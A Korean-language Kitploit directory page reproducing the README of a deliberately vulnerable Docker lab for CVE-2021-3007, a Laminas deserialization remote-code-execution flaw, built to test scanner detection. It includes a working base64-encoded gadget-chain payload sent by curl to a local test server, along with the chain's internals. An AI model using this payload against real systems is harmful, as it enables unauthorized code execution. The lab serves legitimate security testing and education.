Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 취약한 테스트 환경 - Laminas/Zend Framework 역직렬화 RCE | Kitploit
도구/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 취약한 테스트 환경 - Laminas/Zend Framework 역직렬화 RCE

저장소 보기
29개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-3007 취약한 테스트 환경

Docker CVE CVSS

보안 스캐너에서 CVE-2021-3007 탐지를 검증하기 위한 의도적으로 취약하게 만든 테스트 환경입니다.

취약점 개요

속성값
CVE IDCVE-2021-3007
심각도치명적 (CVSS 9.8)
유형안전하지 않은 역직렬화 → RCE
영향을 받는 버전Laminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (신뢰할 수 없는 데이터의 역직렬화)

빠른 시작

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

한 줄 명령어

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

수동 익스플로잇 테스트

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Expected: Response contains "nucleiCVE20213007" confirming RCE

예상: 응답에 "nucleiCVE20213007"이 포함되어 RCE를 확인합니다.

기술 세부 사항

Gadget Chain

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

취약한 구성 요소

패키지버전용도
laminas/laminas-http2.14.1취약한 HTTP 구성 요소
laminas/laminas-view2.12.0Gadget 체인 구성 요소
laminas/laminas-config3.7.0Gadget 체인 구성 요소

취약한 엔드포인트

애플리케이션은 POST를 통해 직렬화된 데이터를 받습니다.

  • 경로: / 또는 /index.php
  • 매개변수: data, payload, serialized
  • 인코딩: Base64

환경 세부 사항

구성 요소값
베이스 이미지php:8.1-apache
포트8080
컨테이너cve-2021-3007-vulnerable

파일

root@kitploit:~
.
├── Dockerfile          # 컨테이너 빌드 구성
├── docker-compose.yml  # 오케스트레이션 (일회성 설정)
├── index.php           # 취약한 PHP 애플리케이션
├── LICENSE             # MIT 라이선스
└── README.md           # 이 파일

보안 알림

경고: 이 환경은 보안 테스트 목적으로만 의도적으로 취약하게 만들어졌습니다.

금지 사항:

  • 공용 네트워크에 노출
  • 프로덕션 환경에 배포
  • 실행 중 방치
  • 악의적인 목적으로 사용

권장 사항:

  • 격리된 테스트 환경에서 사용
  • 사용하지 않을 때 컨테이너 중지
  • 합법적인 보안 연구 목적으로만 사용

참고 자료

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas 보안 릴리스
  • CheckPoint Research - FreakOut
  • Ambionics Research

라이선스

MIT 라이선스 - 보안 연구 및 교육 목적으로만 사용.


nuclei 템플릿 검증을 위해 작성됨 | projectdiscovery/nuclei-templates

도구 다운로드